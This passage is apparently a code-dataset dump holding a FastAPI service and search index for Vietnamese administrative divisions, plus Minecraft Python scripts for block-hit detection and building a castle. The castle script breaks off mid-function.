district_codes:\n continue\n districts[k]['wards'] = tuple(asdict(w.value) for w in group)\n response['districts'] = tuple(districts.values())\n return response\n\n\[email protected]('/d/', 
response_model=List[DistrictResponse])\nasync def list_districts():\n return tuple(asdict(d.value) for d in DistrictEnum)\n\n\[email protected]('/d/search/', response_model=SearchResults)\nasync def search_districts(q: str = SearchQuery,\n p: Optional[int] = Query(None, title='Province code to filter')):\n try:\n return repo.search_district(q, p)\n except QueryParseError:\n raise HTTPException(status_code=422, detail='unrecognized-search-query')\n\n\[email protected]('/d/{code}', response_model=DistrictResponse)\nasync def get_district(code: int,\n depth: int = Query(1, ge=1, le=2, title='Show down to subdivisions',\n description='2: show wards')):\n try:\n district = DistrictEnum[f'D_{code}'].value\n except (KeyError, AttributeError):\n raise HTTPException(404, detail='invalid-district-code')\n response = asdict(district)\n if depth == 2:\n response['wards'] = tuple(asdict(w.value) for w in WardEnum if w.value.district_code == code)\n return response\n\n\[email protected]('/w/', response_model=List[WardResponse])\nasync def list_wards():\n return tuple(asdict(w.value) for w in WardEnum)\n\n\[email protected]('/w/search/', response_model=SearchResults)\nasync def search_wards(q: str = SearchQuery,\n d: Optional[int] = Query(None, title='District code to filter'),\n p: Optional[int] = Query(None, title='Province code to filter, ignored if district is given')):\n try:\n return repo.search_ward(q, d, p)\n except QueryParseError:\n raise HTTPException(status_code=422, detail='unrecognized-search-query')\n\n\[email protected]('/w/{code}', response_model=WardResponse)\nasync def get_ward(code: int):\n try:\n ward = WardEnum[f'W_{code}'].value\n except (KeyError, AttributeError):\n raise HTTPException(404, detail='invalid-ward-code')\n return asdict(ward)\n\n\napp.include_router(api, prefix='/api')\n\n\[email protected]('http')\nasync def guide_cdn_cache(request: Request, call_next):\n response = await call_next(request)\n # Ref: https://vercel.com/docs/edge-network/headers#cache-control-header\n response.headers['Cache-Control'] = f's-maxage={settings.cdn_cache_interval}, stale-while-revalidate'\n return response\n\n\n# Vercel ASGI server doesn't support \"startup\" event, so we have to run this code in global\nlogger.debug('To build search index')\nrepo.build_index()\nlogger.debug('Ready to search')\n" }, { "alpha_fraction": 0.7364864945411682, "alphanum_fraction": 0.7364864945411682, "avg_line_length": 23.66666603088379, "blob_id": "4ce646b43624886245ea76adac8e43b8402ff7a9", "content_id": "b49efc2b6c87e23f6d41b823850844a5eb3cdd91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 80, "num_lines": 6, "path": "/api/__init__.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom single_version import get_version\n\n\n__version__ = get_version('vn-open-api-provinces', Path(__file__).parent.parent)\n" }, { "alpha_fraction": 0.5879529714584351, "alphanum_fraction": 0.5884329080581665, "avg_line_length": 40.25742721557617, "blob_id": "51da96071ded2b632fc63b0b4e512a4e1919ff16", "content_id": "908451e762ab0ae70fdde8b213de6232838246d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4167, "license_type": "no_license", "max_line_length": 112, "num_lines": 101, "path": "/api/search.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": 
"import re\nfrom typing import Optional, Dict, Union, Tuple, List, Any\n\nfrom lunr import lunr\nfrom lunr.index import Index\nfrom logbook import Logger\nfrom unidecode import unidecode\nfrom vietnam_provinces import Province, District, Ward\nfrom vietnam_provinces.enums import ProvinceEnum, DistrictEnum\nfrom vietnam_provinces.enums.wards import WardEnum\n\nfrom .schema import DivisionLevel, SearchResult\n\n\nlogger = Logger(__name__)\n\n\ndef to_search_doc(obj: Union[Province, District, Ward]):\n doc = {\n 'code': obj.code,\n 'name': obj.name\n }\n doc['stripped_name'] = unidecode(doc['name'])\n return doc\n\n\nclass Searcher:\n ready = False\n province_index: Optional[Index] = None\n district_index: Optional[Index] = None\n ward_index: Optional[Index] = None\n\n def build_index(self):\n self.province_index = lunr(ref='code', fields=('name', 'stripped_name'),\n documents=tuple(to_search_doc(p.value) for p in ProvinceEnum))\n self.district_index = lunr(ref='code', fields=('name', 'stripped_name'),\n documents=tuple(to_search_doc(p.value) for p in DistrictEnum))\n self.ward_index = lunr(ref='code', fields=('name', 'stripped_name'),\n documents=tuple(to_search_doc(p.value) for p in WardEnum))\n self.ready = True\n\n def search(self, query: str, level: DivisionLevel = DivisionLevel.P,\n district_code: Optional[int] = None,\n province_code: Optional[int] = None) -> Tuple[SearchResult, ...]:\n if not self.ready:\n logger.warning('Index building does not finished yet!')\n return []\n if level == DivisionLevel.P:\n lresults: List[Dict[str, Any]] = self.province_index.search(query)\n elif level == DivisionLevel.D:\n lresults: List[Dict[str, Any]] = self.district_index.search(query)\n else:\n lresults: List[Dict[str, Any]] = self.ward_index.search(query)\n if not lresults:\n return []\n # Lunrpy sometimes returns duplicate-like results\n # (same ref but different matches and scores). We will combine those.\n dresults = {}\n for r in lresults:\n code = int(r['ref'])\n for term, fields in r['match_data'].metadata.items():\n if level == DivisionLevel.P:\n obj: Province = ProvinceEnum[f'P_{code}'].value\n elif level == DivisionLevel.D:\n obj: District = DistrictEnum[f'D_{code}'].value\n if province_code and obj.province_code != province_code:\n continue\n else:\n obj: Ward = WardEnum[f'W_{code}'].value\n if district_code and obj.district_code != district_code:\n continue\n elif province_code:\n dist: District = DistrictEnum[f'D_{obj.district_code}'].value\n if dist.province_code != province_code:\n continue\n # Find position of matched keyword, to help highlighting\n matches = {}\n matches[term] = locate(obj.name, term)\n try:\n dresults[code].matches.update(matches)\n except KeyError:\n dresults[code] = SearchResult(code=code, name=obj.name, matches=matches)\n return tuple(dresults.values())\n\n def search_province(self, query: str):\n return self.search(query, DivisionLevel.P)\n\n def search_district(self, query: str, province_code: Optional[int] = None):\n return self.search(query, DivisionLevel.D, province_code=province_code)\n\n def search_ward(self, query: str, district_code: Optional[int] = None, province_code: Optional[int] = None):\n return self.search(query, DivisionLevel.W, district_code, province_code)\n\n\ndef locate(name: str, term: str):\n name = unidecode(name).lower()\n term = unidecode(term).lower()\n m = re.search(rf'\\b{term}\\b', name)\n if not m:\n raise ValueError\n return (m.start(0), m.end(0))\n" } ]
11
billythegoat356/TCP_Chat
https://github.com/billythegoat356/TCP_Chat
b98aa55c2f1b6e5d644e590bb13487656df6e5b8
be6cc185f1860b38ee4e2a0a833a49bf2bf4f6fb
b098ee972c09b3de7b432145e75c345bef14f5ce
refs/heads/main
2023-06-23T03:12:17.733673
2021-07-25T13:26:33
2021-07-25T13:26:33
387,459,663
25
3
null
null
null
null
null
[ { "alpha_fraction": 0.5226321220397949, "alphanum_fraction": 0.5345368981361389, "avg_line_length": 22.421724319458008, "blob_id": "831201726e622d7d8d8ae85726751d8449e36eda", "content_id": "b3871f59ec8c35915293cd448aeb5dbc482c6079", "detected_licenses": [ "CC0-1.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7649, "license_type": "permissive", "max_line_length": 127, "num_lines": 313, "path": "/CLIENT/client.py", "repo_name": "billythegoat356/TCP_Chat", "src_encoding": "UTF-8", "text": "import socket\r\nimport tkinter as tk\r\n\r\nfrom json import dumps, loads\r\nfrom threading import Thread\r\nfrom os import system, name\r\nfrom time import sleep\r\n\r\n\r\nsystem(\"\")\r\n\r\n\r\ndef clear():\r\n system(\"cls\" if name == 'nt' else \"clear\")\r\n\r\n\r\nhost, port = 'localhost', 8500\r\n\r\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n\r\n\r\nclass Colors:\r\n \r\n def print(self, color, text) -> str:\r\n return \"\\033[38;2;{}m{}\\033[38;2;255;255;255m\".format(color, text)\r\n\r\n def red(self, text) -> str:\r\n return self.print('255;0;0', text)\r\n\r\n def green(self, text) -> str:\r\n return self.print('0;255;0', text)\r\n\r\n def blue(self, text) -> str:\r\n return self.print('0;0;255', text)\r\n\r\n\r\n\r\nclass Client:\r\n\r\n def __init__(self, socket):\r\n\r\n \r\n\r\n window = tk.Tk()\r\n self.window = window\r\n\r\n window.title(\"Chat\")\r\n\r\n geometry = self.tkinter_screen_set(400, 300)\r\n \r\n window.geometry(geometry)\r\n window.resizable(width=False, height=False)\r\n window.configure(background=\"black\")\r\n\r\n\r\n self.var = var = tk.StringVar()\r\n var.set(\"Connexion au serveur en cours...\")\r\n\r\n self.main_label = main_label = tk.Label(window, textvariable=var)\r\n\r\n\r\n main_label.pack()\r\n\r\n main_thread = Thread(target=self.tkinter)\r\n main_thread.start()\r\n\r\n\r\n self.window.mainloop()\r\n\r\n def tkinter(self):\r\n\r\n\r\n while True:\r\n try:\r\n socket.connect((host, port))\r\n except ConnectionRefusedError:\r\n self.var.set(\"Erreur lors de la connexion au serveur. Tentative de reconnexionen cours...\")\r\n continue\r\n break\r\n\r\n self.var.set(\"Récupération de l'identifiant...\")\r\n\r\n self.socket = socket\r\n id = socket.recv(1024).decode('utf-8')\r\n\r\n self.id = id\r\n\r\n\r\n\r\n\r\n\r\n if not id:\r\n self.var.set(\"Le serveur est hors ligne. 
Réessayez plus tard.\")\r\n disconnect_button = tk.Button(self.window(), text=\"Quitter\", command=self.tkinter_exit_button).pack()\r\n input()\r\n\r\n \r\n self.var.set(\"Votre ID est: {}\".format(id))\r\n\r\n sleep(2.5)\r\n\r\n self.window.title(\"Chat - ID: {}\".format(id))\r\n \r\n self.set_username()\r\n\r\n self.connect()\r\n\r\n\r\n def set_username(self):\r\n self.username = None\r\n\r\n self.var.set(\"Entrez votre pseudo:\")\r\n\r\n self.username_entry = username_entry = tk.Entry(self.window)\r\n username_button = tk.Button(self.window, text=\"Confirmer\", command=self.tkinter_username_button)\r\n \r\n username_entry.pack()\r\n username_button.pack()\r\n\r\n while True:\r\n if self.username is not None:\r\n break\r\n\r\n username_button.pack_forget()\r\n\r\n self.var.set(\"Votre pseudo est: {}\".format(self.username))\r\n\r\n sleep(2.5)\r\n\r\n self.window.title(\"Chat - ID: {} - Pseudo: {}\".format(self.id, self.username))\r\n\r\n data = {'name':self.username}\r\n self.send(data)\r\n\r\n\r\n def connect(self):\r\n\r\n\r\n self.connected = None\r\n\r\n self.var.set(\"Entrez l'ID de l'utilisateur auquel vous voulez vous connecter:\")\r\n\r\n self.connect_button = connect_button = tk.Button(self.window, text=\"Se connecter\", command=self.tkinter_connect_button)\r\n connect_button.pack()\r\n\r\n while True:\r\n if self.connected is not None:\r\n break\r\n\r\n\r\n self.var.set(self.connected)\r\n\r\n if self.connected == \"Waiting for connection...\":\r\n self.username_entry.pack_forget()\r\n connect_button.pack_forget()\r\n while True:\r\n resp = self.socket.recv(1024).decode('utf-8')\r\n if resp:\r\n self.var.set(resp)\r\n break\r\n \r\n if self.username_entry.winfo_ismapped() and connect_button.winfo_ismapped():\r\n self.username_entry.pack_forget()\r\n connect_button.pack_forget()\r\n\r\n\r\n\r\n self.tkinter_chat()\r\n\r\n\r\n\r\n def tkinter_chat(self):\r\n\r\n self.window.geometry(\"1200x800\")\r\n\r\n self.tkinter_chat_entry()\r\n\r\n self.tkinter_chat_button()\r\n\r\n recv_thread = Thread(target=self.tkinter_chat_recv)\r\n\r\n recv_thread.start()\r\n\r\n recv_thread.join()\r\n\r\n\r\n\r\n def send(self, data):\r\n try:\r\n self.socket.send(dumps(data).encode('utf-8'))\r\n except:\r\n return self.disconnect()\r\n\r\n\r\n def disconnect(self):\r\n try:\r\n self.socket.disconnect()\r\n except:\r\n pass\r\n return exit()\r\n \r\n\r\n def tkinter_chat_entry(self):\r\n text = tk.Entry(self.window)\r\n self.text = text\r\n\r\n text.pack(expand=True)\r\n \r\n def tkinter_chat_button(self):\r\n button = tk.Button(self.window, text=\"Envoyer\", command=self.tkinter_chat_send)\r\n self.button = button\r\n \r\n button.pack(expand=True)\r\n\r\n def tkinter_chat_send(self):\r\n content = self.text.get()\r\n\r\n if content == \"\":\r\n return\r\n\r\n data = {'message':content}\r\n\r\n try:\r\n self.send(data)\r\n except:\r\n return self.disconnect()\r\n\r\n self.text.delete(first=0, last=len(self.text.get()))\r\n\r\n self.var.set(self.var.get() + '\\n' + \"{}: {}\".format(self.username, content))\r\n\r\n def tkinter_chat_recv(self):\r\n while True:\r\n try:\r\n data = loads(socket.recv(1024).decode('utf-8'))\r\n except:\r\n return self.disconnect()\r\n\r\n for username in data['message']:\r\n self.var.set(self.var.get() + '\\n' + username + \": \" + data['message'][username])\r\n break\r\n \r\n \r\n def tkinter_username_button(self):\r\n username = self.username_entry.get()\r\n\r\n self.username_entry.delete(first=0, last=len(self.username_entry.get()))\r\n\r\n if len(username) < 3:\r\n 
self.var.set(\"Pseudo trop court! (min. 3)\")\r\n \r\n elif len(username) > 10:\r\n self.var.set(\"Pseudo trop long! (max. 10)\")\r\n \r\n else:\r\n self.username = username\r\n \r\n def tkinter_connect_button(self):\r\n content = self.username_entry.get()\r\n\r\n self.username_entry.delete(first=0, last=len(self.username_entry.get()))\r\n\r\n if content == self.id:\r\n self.connectino_error(\r\n \"Tu ne peux pas te connecter à toi même xD\"\r\n )\r\n\r\n data = {'connect':content}\r\n self.send(data)\r\n\r\n response = self.socket.recv(1024).decode('utf-8')\r\n\r\n if response == 'invalid id':\r\n self.connectino_error(\"ID invalide!\")\r\n else:\r\n self.var.set(response)\r\n self.connected = response\r\n\r\n def connectino_error(self, text):\r\n self.var.set(text)\r\n self.username_entry.pack_forget()\r\n self.connect_button.pack_forget()\r\n disconnect_button = tk.Button(self.window(), text=\"Quitter\", command=self.tkinter_exit_button).pack()\r\n input()\r\n\r\n\r\n\r\n\r\n def tkinter_screen_set(self, window_x, window_y):\r\n screen_x, screen_y = self.window.winfo_screenwidth(), self.window.winfo_screenheight()\r\n \r\n x = screen_x / 2 + window_x / 2\r\n y = screen_y / 2 + window_y / 2\r\n\r\n return \"{}x{}+{}+{}\".format(window_x, window_y, int(x), int(y))\r\n\r\n def tkinter_exit_button(self):\r\n return self.disconnect()\r\n\r\n\r\n\r\ndef main():\r\n\r\n\r\n client = Client(socket)\r\n\r\n\r\n socket.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" }, { "alpha_fraction": 0.5969429016113281, "alphanum_fraction": 0.607401430606842, "avg_line_length": 13.320987701416016, "blob_id": "743ec2b528411872d439dcbd115f48ab246d8b01", "content_id": "b3a6d12650a88c40f9298aa0f6dcdc2a6e3e8727", "detected_licenses": [ "CC0-1.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1243, "license_type": "permissive", "max_line_length": 58, "num_lines": 81, "path": "/SERVER/server.py", "repo_name": "billythegoat356/TCP_Chat", "src_encoding": "UTF-8", "text": "import socket\r\n\r\nfrom threading import Thread\r\nfrom json import dumps\r\nfrom random import randint\r\n\r\nfrom src.client import Client, clients\r\n\r\n\r\nhost, port = '', 8500\r\n\r\n\r\n\r\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n\r\nsocket.bind((host, port))\r\nprint(\"Le serveur est en ligne!\")\r\n\r\n\r\n\r\ndef client_start(conn, addr, surplus=0):\r\n\r\n client_number = randint(100, 1000) + surplus\r\n\r\n\r\n if client_number in clients:\r\n return client_start(conn, addr, client_number)\r\n\r\n return client_thread_start(conn, addr, client_number)\r\n\r\n\r\n\r\ndef client_thread_start(conn, addr, client_number):\r\n\r\n try:\r\n conn.send(str(client_number).encode('utf-8'))\r\n Client(client_number, conn, addr)\r\n except:\r\n pass\r\n \r\n return client_number\r\n\r\n\r\n\r\n\r\ndef listen():\r\n socket.listen()\r\n conn, addr = socket.accept()\r\n\r\n client_start(conn, addr)\r\n return listen()\r\n\r\n\r\ndef stop_loop():\r\n stop = input(\"\")\r\n if stop == 'y':\r\n socket.close()\r\n \r\n return stop_loop()\r\n\r\n\r\n\r\n\r\n\r\nloop = Thread(target=listen)\r\nstop_thread = Thread(target=stop_loop)\r\n\r\nloop.start()\r\nstop_thread.start()\r\n\r\n\r\n\r\nloop.join()\r\n\r\n\r\n\r\nfor client in clients:\r\n client.close()\r\n\r\nsocket.close()\r\n\r\n" }, { "alpha_fraction": 0.45978879928588867, "alphanum_fraction": 0.4634443521499634, "avg_line_length": 19.61403465270996, "blob_id": "26a53bedb53bb9d509c3069c095b4d6989a07856", "content_id": 
"b878e7badb29f900838c5892bb4419baaf7e85bf", "detected_licenses": [ "CC0-1.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2462, "license_type": "permissive", "max_line_length": 82, "num_lines": 114, "path": "/SERVER/src/client.py", "repo_name": "billythegoat356/TCP_Chat", "src_encoding": "UTF-8", "text": "import socket\r\n\r\nfrom random import randint\r\nfrom threading import Thread\r\nfrom json import dumps, loads\r\n\r\n\r\nclients = {}\r\n\r\n\r\n\r\nclass Client:\r\n \r\n\r\n\r\n\r\n \r\n def __init__(self, id:int, conn, addr) -> None:\r\n\r\n\r\n clients[str(id)] = self\r\n\r\n self.id = str(id)\r\n self.conn = conn\r\n self.addr = addr\r\n \r\n self.name = None\r\n self.linked = None\r\n\r\n\r\n\r\n self.thread = Thread(target=self.connect)\r\n self.thread.start()\r\n\r\n\r\n\r\n def connect(self):\r\n \r\n\r\n try:\r\n data = loads(self.conn.recv(1024).decode('utf-8'))\r\n if len(data) > 1:\r\n return self.disconnect()\r\n except:\r\n return self.disconnect()\r\n\r\n\r\n \r\n thread = Thread(target=self.message_handler, args=[data])\r\n\r\n thread.start()\r\n\r\n return self.connect()\r\n\r\n \r\n def send(self, content):\r\n try:\r\n self.conn.send(content.encode('utf-8'))\r\n except:\r\n return\r\n\r\n\r\n\r\n\r\n def message_handler(self, data):\r\n\r\n if self.name is None:\r\n if 'name' in data and len(data['name']) < 10:\r\n self.name = data['name']\r\n print(f\"{self.id} : {self.name}\")\r\n else:\r\n self.disconnect()\r\n\r\n\r\n if 'connect' in data:\r\n if self.linked is not None:\r\n return self.disconnect() \r\n\r\n\r\n if data['connect'] not in clients or data['connect'] == self.id:\r\n self.send('invalid id')\r\n return self.disconnect()\r\n\r\n else:\r\n self.linked = clients[data['connect']]\r\n\r\n if self.linked.linked != self:\r\n self.send('Waiting for connection...')\r\n # self.linked.send('Someone connected to you! ID: {self.id}!')\r\n else:\r\n self.send('Connected!')\r\n self.linked.send(\"Connected!\")\r\n\r\n elif 'message' in data:\r\n if not self.linked:\r\n self.send('invalid id')\r\n self.disconnect()\r\n if self.linked.linked == self:\r\n self.linked.send(dumps({'message':{self.name:data['message']}}))\r\n\r\n def disconnect(self):\r\n try:\r\n del clients[self.id]\r\n return self.conn.close()\r\n except:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass Admin(Client):\r\n pass" } ]
3
heidichen/cs207test
https://github.com/heidichen/cs207test
bf16b936e89ba49e1211a9b2dca57e1184f0eb7a
8ba4be34e42c9e84f56cb32d93a8ecdac755d5ba
2b9a4f770a13425907fc60236f340c2cc8a4acc7
refs/heads/master
2021-01-12T17:06:59.640250
2016-09-30T14:03:32
2016-09-30T14:03:32
69,055,550
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7348993420600891, "alphanum_fraction": 0.7852349281311035, "avg_line_length": 58.79999923706055, "blob_id": "b5c79129198d0ef0f89f0105d7d4184a6c38484a", "content_id": "c8ba029e8e5da95b1daeb478b4fde4d016bf064e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 298, "license_type": "no_license", "max_line_length": 162, "num_lines": 5, "path": "/README.md", "repo_name": "heidichen/cs207test", "src_encoding": "UTF-8", "text": "# cs207test\n\n[![Build Status](https://travis-ci.org/heidichen/cs207test.svg?branch=master)](https://travis-ci.org/heidichen/cs207test)\n\n[![Coverage Status](https://coveralls.io/repos/github/heidichen/cs207test/badge.svg?branch=master)](https://coveralls.io/github/heidichen/cs207test?branch=master)" }, { "alpha_fraction": 0.6155914068222046, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 22.25, "blob_id": "2dfa0c5600f35fbd8e71c773248b688221d37f3c", "content_id": "7047e1054bc915fc6b3cd0d31766ebf023c9bf45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 40, "num_lines": 16, "path": "/test_binsearch.py", "repo_name": "heidichen/cs207test", "src_encoding": "UTF-8", "text": "from pytest import raises\nfrom binsearch import binary_search\n\ndef test_binsearch():\n input = list(range(10))\n assert binary_search(input, 5) == 5\n\ndef test_char_binsearch():\n with raises(TypeError):\n binary_search(['a', 3])\n\ndef test_binary_empty():\n asset binary_search([], 1) == -1\n\ndef test_binary_noitem():\n asset binary_search([3, 4], 1) == -1\n" } ]
2
Cody-Coleman/minecraft-scripts
https://github.com/Cody-Coleman/minecraft-scripts
cb2a0edb35c6c2dd9f90ad140f11b1e73e143398
d90a646426f4d807de43919161fd752d5fa008c8
536a730adbcfe59e3fc7231a3fa0ce6c0804ca9d
refs/heads/master
2020-03-30T05:17:27.474645
2018-12-13T00:56:56
2018-12-13T00:56:56
150,790,894
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5867970585823059, "alphanum_fraction": 0.5897310376167297, "avg_line_length": 30.461538314819336, "blob_id": "dfcbd15233a8dd5ea97cf59c0460f4ec6744341c", "content_id": "175682b58e2e7f4ff903e070094b9557aa84ebf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2045, "license_type": "no_license", "max_line_length": 122, "num_lines": 65, "path": "/detectors/hit_detector.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "from threading import Thread\nfrom time import sleep\nfrom mcpi.minecraft import Minecraft\n\n\nclass HitDetector:\n \"\"\"\n Class that can take any number of check_hits functions and spins off a thread to process them,\n passing the list of hit blocks data\n \"\"\"\n def __init__(self):\n \"\"\"\n Init the class with an empty check_list, and various flags\n \"\"\"\n self.check_list = []\n self.running = True\n self.t1 = None\n self.mc = Minecraft.create()\n\n def check_on(self):\n \"\"\"\n Starts the checker, setting the flag to true, creating the thread, and starting it.\n Needs to clear out all previous events first.\n :return:\n \"\"\"\n self.mc.events.clearAll()\n self.running = True\n self.t1 = Thread(target=self.check_hits)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def check_hits(self):\n \"\"\"\n Gets all the events and then loops through all the functions that could be matches to this.\n Would be smarter to thread this out further as well.\n :return:\n \"\"\"\n while self.running:\n sleep(0.5)\n hits = self.mc.events.pollBlockHits()\n for func in self.check_list:\n func(hits)\n\n def check_off(self):\n \"\"\" Simple command disables all checks \"\"\"\n self.running = False\n\n def add_check(self, func):\n if not self.running:\n self.check_list.append(func)\n else:\n print(\"You cannot add a new check to the already running checker. Stop it first then add a check\")\n\n def del_check(self, func):\n if not self.running:\n self.check_list.remove(func)\n else:\n print(\"You cannot remove a check to an already running checker. Stop it first then add a check\")\n\n def __del__(self):\n \"\"\"\n shut down the threads. 
Calling the check_off in case there is more that needs / wants to be added to the shut down\n :return:\n \"\"\"\n self.check_off()\n" }, { "alpha_fraction": 0.5493061542510986, "alphanum_fraction": 0.5693860650062561, "avg_line_length": 35.030303955078125, "blob_id": "daf6ef37808f385db2f1f7904ad6320cf04b7115", "content_id": "9ce4e38d048e44446eba05abdcf835d18e1bf3e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9512, "license_type": "no_license", "max_line_length": 113, "num_lines": 264, "path": "/builds/castle.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# --------------------------------------\n#\n# Minecraft Python API\n# Castle Builder\n#\n# This script creates a castle complete\n# with moat and perimeter walls.\n#\n# Author : Matt Hawkins\n# Date : 07/06/2014\n#\n# https://www.raspberrypi-spy.co.uk/\n#\n# --------------------------------------\n\n# Import Minecraft libraries\nimport sys\nfrom mcpi.minecraft import Minecraft\nimport mcpi.block as block\nfrom time import sleep\n\n\n# mc.postToChat(\"Let's build a castle!\")\n\n\n# --------------------------------------\n# Define Functions\n# --------------------------------------\ndef create_walls(mc, posx, posy, posz, size, height, material=block.STONE_BRICK.id, modifier=1, battlements=True,\n walkway=True):\n \"\"\"\n Creates 4 walls in a box, that are size long and height tall out of material\n :param mc: Minecraft client\n :param posx: The starting x position\n :param posy: The starting y position\n :param posz: The starting z position\n :param size: How long to make the walls\n :param height: How high to make the walls\n :param material: What to make the walls out of, defaults to mossy stone brick\n :param modifier: If the block takes a modifier\n :param battlements: If set will add battlements to the wall\n :param walkway: If set will add a walkway to the wall\n :return:\n \"\"\"\n # mc.postToChat(\"Creating Walls\")\n # WALL 1\n mc.setBlocks(posx - size, posy + 1, posz - size, posx + size, posy + height, posz - size, material, modifier)\n # WALL 2\n mc.setBlocks(posx - size, posy + 1, posz - size, posx - size, posy + height, posz + size, material, modifier)\n # WALL 3\n mc.setBlocks(posx + size, posy + 1, posz + size, posx - size, posy + height, posz + size, material, modifier)\n # WALL 4\n mc.setBlocks(posx + size, posy + 1, posz + size, posx + size, posy + height, posz - size, material, modifier)\n sleep(5)\n\n if battlements:\n # mc.postToChat(\"Creating battlements\")\n for i in range(0, (2 * size) + 1, 2):\n # WALL 1\n mc.setBlock(((posx - size) + i), posy + height + 1, posz - size, material, modifier)\n mc.setBlock(((posx - size) + i), posy + height + 2, posz - size, block.TORCH.id, 5)\n # WALL 2\n mc.setBlock(posx - size, posy + height + 1, ((posz - size) + i), material, modifier)\n mc.setBlock(posx - size, posy + height + 2, ((posz - size) + i), block.TORCH.id, 5)\n\n # WALL 3\n mc.setBlock(((posx - size) + i), posy + height + 1, posz + size, material, modifier)\n mc.setBlock(((posx - size) + i), posy + height + 2, posz + size, block.TORCH.id, 5)\n\n # WALL 4\n mc.setBlock(posx + size, posy + height + 1, ((posz - size) + i), material, modifier)\n mc.setBlock(posx + size, posy + height + 2, ((posz - size) + i), block.TORCH.id, 5)\n sleep(5)\n\n if walkway:\n # mc.postToChat(\"Creating Walkways\")\n # WALL 1\n mc.setBlocks(posx - size + 1, posy + height - 1, posz - size + 1,\n posx + size - 1, posy + 
height - 1, posz - size + 1,\n block.STONE_SLAB.id, 2)\n # WALL 2\n mc.setBlocks(posx - size + 1, posy + height - 1, posz - size + 1,\n posx - size + 1, posy + height - 1, posz + size - 1,\n block.STONE_SLAB.id, 2)\n # WALL 3\n mc.setBlocks(posx + size - 1, posy + height - 1, posz + size - 1,\n posx - size + 1, posy + height - 1, posz + size - 1,\n block.STONE_SLAB.id, 2)\n # WALL 4\n mc.setBlocks(posx + size - 1, posy + height - 1, posz - size + 1,\n posx + size - 1, posy + height - 1, posz + size - 1,\n block.STONE_SLAB.id, 2)\n sleep(5)\n\n\ndef create_landscape(mc, posx, posy, posz, size, moat_depth=3):\n \"\"\"\n Sets upper half to air and creates an island with a moat floating in the air\n :param mc: Minecraft client\n :param size: the initial size of everything, the island and moat are multiples of this\n :param posx: The starting x position for the island, where it will center on\n :param posy: The starting y position for the island\n :param posz: The starting z position for the island\n :param moat_depth: How deep the moat\n \"\"\"\n island_size = size * 2 + 3\n moat_size = (size * 2) + 6\n\n # Set upper half to air\n mc.postToChat(\"setting upper half to air\")\n mc.setBlocks(posx - moat_size, posy - 4, posz - moat_size,\n posx + moat_size, posy + 25, posz + moat_size, block.AIR.id)\n sleep(5)\n\n # Create water moat\n mc.postToChat(\"Setting up moat\")\n mc.setBlocks(posx - moat_size, posy, posz - moat_size,\n posx + moat_size, posy - moat_depth, posz + moat_size,\n block.WATER.id)\n\n sleep(5)\n\n # Set lower half of world to dirt with a layer of grass\n mc.postToChat(\"Creating Land\")\n mc.setBlocks(posx - island_size, posy, posz - island_size,\n posx + island_size, posy - 4, posz + island_size, block.DIRT.id)\n\n # create island\n mc.postToChat(\"Creating Grass\")\n mc.setBlocks(posx - island_size, posy, posz - island_size,\n posx + island_size, posy, posz + island_size, block.GRASS.id)\n\n\ndef create_keep(mc, posx, posy, posz, size, levels):\n \"\"\"\n Create a keep with specified number of floors and a roof\n :param mc: Minecraft Client\n :param posx: starting x position\n :param posy: starting y position\n :param posz: starting z position\n :param size: How wide to make it\n :param levels: How tall to make it\n \"\"\"\n # Create a keep with a specified number\n # of floors levels and a roof\n mc.postToChat(\"Creating Keep\")\n height = (levels * 6) + 5\n create_walls(mc, posx, posy, posz, size, height)\n # Floors and Windows\n for level in range(1, levels):\n mc.setBlocks(posx - size + 1, (level * 6) + posy, posz - size + 1,\n posx + size - 1, (level * 6) + posy, posz + size - 1,\n block.STONE_BRICK.id, 2)\n # Windows\n for level in range(1, levels):\n # WALL 1\n create_windows(mc, posx, (level * 6) + posy + 2, posz - size, \"S\")\n # WALL 2\n create_windows(mc, posx - size, (level * 6) + posy + 2, posz, \"W\")\n # WALL 3\n create_windows(mc, posx, (level * 6) + posy + 2, posz + size, \"N\")\n # WALL 4\n create_windows(mc, posx + size, (level * 6) + posy + 2, posz, \"E\")\n\n # DOOR ON SOUTH WALL\n mc.setBlocks(posx - 1, posy + 1, posz - size, posx + 1, posy + 2, posz - size, block.AIR.id)\n\n\ndef create_windows(mc, posx, posy, posz, direction):\n \"\"\"\n Creates windows in keep\n :param mc: the minecraft client\n :param posx: x starting position\n :param posy: y starting position\n :param posz: z starting position\n :param direction: what direction this is facing\n \"\"\"\n if direction == \"N\" or direction == \"S\":\n z1 = posz\n z2 = posz\n z3 = posz\n x1 = posx - 
